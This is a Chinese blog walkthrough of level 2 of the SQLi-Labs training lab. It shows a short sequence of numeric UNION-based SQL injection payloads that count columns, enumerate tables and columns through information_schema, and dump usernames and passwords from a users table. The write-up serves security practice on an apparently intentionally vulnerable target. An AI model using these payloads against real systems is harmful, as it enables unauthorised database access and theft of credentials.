互动

SQLiLabs打靶-第二关

loker66fan 字数: 3644 阅读耗时: 9 分钟 2024/06/15 博客独享热度: 38 评论: 0

SQLiLabs第二关

和第一关是一样进行判断，入单引号或者双引号可以看到报错，且报错信息看不到数字，可以猜测sql语句应该是数字型注入。那步骤和我们第一关是一样。

?id=1 order by 3
?id=-1 union select 1,2,3
?id=-1 union select 1,database(),version()
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
?id=-1 union select 1,group_concat(username),group_concat(password) from users

原创 SQLiLabs打靶-第二关

SQLiLabs打靶-第二关

本文是原创文章，采用 CC BY-NC-ND 4.0 协议，完整转载请注明来自 loekr

匿名评论隐私政策

你无需删除空行，直接评论以获取最佳展示效果

Steam卡片